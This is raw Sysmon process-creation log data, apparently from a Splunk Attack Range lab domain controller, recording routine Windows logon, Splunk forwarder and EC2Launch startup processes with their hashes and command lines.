AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015514Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:21.099{A8622C2F-4209-6078-7104-00000000AE01}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015244Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:57.838{A8622C2F-41F1-6078-3F04-00000000AE01}6976C:\Windows\System32\findstr.exe10.0.14393.0 (rs1_release.160715-1616)Find String (QGREP) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFINDSTR.EXEfindstr /v DELETEME C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=15B171EC73E7B71F4EBB4247E716271E,SHA256=2956F7BC863498DFCC868CE7DF4C9C131A4A5C17B065658456AFEF7566ACE1EE,IMPHASH=D7962312082AAB17974D6817E09E5D7A{A8622C2F-41EC-6078-3904-00000000AE01}7104C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 154100x800000000000000015234Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:57.805{A8622C2F-41F1-6078-3E04-00000000AE01}6860C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-41EC-6078-3904-00000000AE01}7104C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 154100x800000000000000015203Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:55.477{A8622C2F-41EF-6078-3D04-00000000AE01}6668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESC6B2.tmp" "c:\Users\Administrator\AppData\Local\Temp\lyei3dhy\CSC6B06D1F9D9D54B0F966DC4AE4AD0F469.TMP"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{A8622C2F-41EF-6078-3C04-00000000AE01}6684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig 
/fullpaths @"C:\Users\Administrator\AppData\Local\Temp\lyei3dhy\lyei3dhy.cmdline" 154100x800000000000000015192Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:55.157{A8622C2F-41EF-6078-3C04-00000000AE01}6684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\lyei3dhy\lyei3dhy.cmdline"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{A8622C2F-41EC-6078-3B04-00000000AE01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" 154100x800000000000000015137Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:52.426{A8622C2F-41EC-6078-3B04-00000000AE01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" 
C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-41EC-6078-3904-00000000AE01}7104C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 154100x800000000000000015113Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:52.362{A8622C2F-41EC-6078-3904-00000000AE01}7104C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000012959Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:34.934{A8622C2F-41DA-6078-1804-00000000AE01}5712C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" 
"C:\Windows\System32\iesetup.dll",IEHardenUserC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000012932Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:33.732{A8622C2F-41D9-6078-1704-00000000AE01}3684C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iesetup.dll",IEHardenAdminC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000012852Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:30.987{A8622C2F-41D6-6078-0C04-00000000AE01}5908C:\Windows\System32\unregmp2.exe12.0.14393.4169 (rs1_release.210107-1130)Microsoft Windows Media Player Setup UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationunregmp2.exe"C:\Windows\System32\unregmp2.exe" /FirstLogonC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0AFAF8B10C3D2B009DED280C875EA3EA,SHA256=CFC5A8170AF2CCB8F846BA738E5173596A4C35C023BCE5E6EB04E07779283188,IMPHASH=DFC94E57160B0CE8835243B5D92F3D9E{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000012727Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:38:27.605{A8622C2F-41D3-6078-F803-00000000AE01}5760C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-41D3-6078-F003-00000000AE01}5228C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 154100x800000000000000012720Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:27.603{A8622C2F-41D3-6078-F703-00000000AE01}5780C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-41D3-6078-F003-00000000AE01}5228C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 154100x800000000000000012688Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:27.087{A8622C2F-41D3-6078-F003-00000000AE01}5228C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXEC:\Windows\System32\ie4uinit.exe 
-ClearIconCacheC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{A8622C2F-41D2-6078-E803-00000000AE01}5884C:\Windows\System32\ie4uinit.exe"C:\Windows\System32\ie4uinit.exe" -UserConfig 154100x800000000000000012434Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:26.274{A8622C2F-41D2-6078-EB03-00000000AE01}6060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000012277Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:26.039{A8622C2F-41D2-6078-E803-00000000AE01}5884C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXE"C:\Windows\System32\ie4uinit.exe" -UserConfigC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000011981Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:38:25.021{A8622C2F-41D1-6078-E203-00000000AE01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011831Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:24.351{A8622C2F-41D0-6078-E103-00000000AE01}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011765Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:24.290{A8622C2F-41D0-6078-E003-00000000AE01}5192C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXErundll32.exe 
AppXDeploymentExtensions.OneCore.dll,ShellRefreshC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-41CD-6078-D003-00000000AE01}5464C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx 154100x800000000000000011670Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:23.663{A8622C2F-41CF-6078-DB03-00000000AE01}6048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011567Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:22.678{A8622C2F-41CE-6078-D203-00000000AE01}5636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011544Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:38:21.990{A8622C2F-41CD-6078-D103-00000000AE01}5528C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011501Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:21.589{A8622C2F-41CD-6078-CF03-00000000AE01}5392C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k AppReadinessC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000011465Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:21.100{A8622C2F-41CD-6078-CD03-00000000AE01}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011431Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:20.473{A8622C2F-41CC-6078-C903-00000000AE01}3068C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\Explorer.EXEC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{A8622C2F-41CC-6078-C803-00000000AE01}5040C:\Windows\System32\userinit.exeC:\Windows\system32\userinit.exe 154100x800000000000000011395Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:20.329{A8622C2F-41CC-6078-C803-00000000AE01}5040C:\Windows\System32\userinit.exe10.0.14393.0 (rs1_release.160715-1616)Userinit Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationUSERINIT.EXEC:\Windows\system32\userinit.exeC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C1B1FFC800BE2F31EB2CF8CB40629C69,SHA256=CFC6A18FC8FE7447ECD491345A32F0F10208F114B70A0E9D1CD72F6070D5B36F,IMPHASH=BFA137B16F3492AFCA0551687B067C04{A8622C2F-41C8-6078-A603-00000000AE01}4600C:\Windows\System32\winlogon.exewinlogon.exe 154100x800000000000000011208Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:19.446{A8622C2F-41CB-6078-BC03-00000000AE01}2760C:\Windows\System32\rdpclip.exe10.0.14393.3503 (rs1_release.200131-0410)RDP Clipboard 
MonitorMicrosoft® Windows® Operating SystemMicrosoft Corporationrdpclip.exerdpclipC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D887E718FB0F4C99B9F01C5BD59F8B90,SHA256=ACFA1128B4EDD953F6364FA6216337A59C0522A01349263A11259A827838A56F,IMPHASH=5A464814303942D42A66B561CF697F26{A8622C2F-3DEE-6078-0F00-00000000AE01}1116C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k termsvcs 154100x800000000000000011171Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:19.405{A8622C2F-41CB-6078-BB03-00000000AE01}2116C:\Windows\System32\TSTheme.exe10.0.14393.4169 (rs1_release.210107-1130)TSTheme Server ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationTSThemeS.exeC:\Windows\system32\TSTheme.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D5E6B1DA9AEE1CC85A50894A07700B98,SHA256=3A22AAA677B8B658386F6A22ECFB36795DC1BE55AED591FEAA05CA8D36973464,IMPHASH=851EBF0BAEED8A212E02B93229FDC674{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000011113Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:19.394{A8622C2F-41CB-6078-BA03-00000000AE01}4624C:\Windows\System32\efsui.exe10.0.14393.0 (rs1_release.160715-1616)EFS UI ApplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationefsui.exeefsui.exe /efs /installdraC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=6DFA1BBB4D2F89DC46BACABC83B6AB95,SHA256=1106CE6AE6EDFFA752D71F5EFF9FAAB53360CFFC6B224957760FBDC0A7D4FF17,IMPHASH=B865E978ADDB9A939A91896A60E81464{A8622C2F-3DEC-6078-0B00-00000000AE01}840C:\Windows\System32\lsass.exeC:\Windows\system32\lsass.exe 154100x800000000000000010936Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:38:18.173{A8622C2F-41CA-6078-B003-00000000AE01}4864C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe10.0.14393.4222 (rs1_release.210113-1739)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=1571A4132449A317F66DF783E9468783,SHA256=5CFF48937FAE7F0CF5935248959141E2A60E88FE8105C43676B866FDAC36ADD2,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000010921Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:18.085{A8622C2F-41CA-6078-AF03-00000000AE01}2788C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000010769Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:17.327{A8622C2F-41C9-6078-AB03-00000000AE01}4120C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window 
